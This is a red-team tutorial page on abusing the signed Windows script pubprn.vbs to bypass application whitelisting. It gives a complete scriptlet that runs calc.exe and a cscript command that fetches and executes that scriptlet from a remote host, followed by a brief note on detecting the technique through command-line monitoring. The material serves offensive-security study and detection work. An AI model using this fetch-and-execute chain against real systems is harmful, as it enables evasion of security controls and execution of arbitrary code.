pubprn.vbs Signed Script Code Execution

Red Teaming Experiments

linkedin github @spotheplanet patreon

Search…

What is ired.team?

Pinned

Pentesting Cheatsheets

Active Directory & Kerberos Abuse

offensive security

reversing, forensics & misc

Internals

Cloud

Neo4j

Dump Virtual Box Memory

AES Encryption Using Crypto++ .lib in Visual Studio C++

Reversing Password Checking Routine

pubprn.vbs Signed Script Code Execution

Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs

Execution
Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:
http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
1
<?XML version="1.0"?>
2
<scriptlet>
3
​
4
<registration
5
    description="Bandit"
6
    progid="Bandit"
7
    version="1.00"
8
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
9
	>
10
</registration>
11
​
12
<script language="JScript">
13
<![CDATA[
14
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
15
]]>
16
</script>
17
​
18
</scriptlet>
Copied!
[email protected]
1
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
Copied!
Observations
Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:
Monitoring commandlines can be useful in detecting the script being abused:
References
Signed Script Proxy Execution, Technique T1216 - Enterprise | MITRE ATT&CK®

Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse

Next - offensive security

Code & Process Injection

Last modified 2yr ago

Copy link

Contents

Execution

Observations

References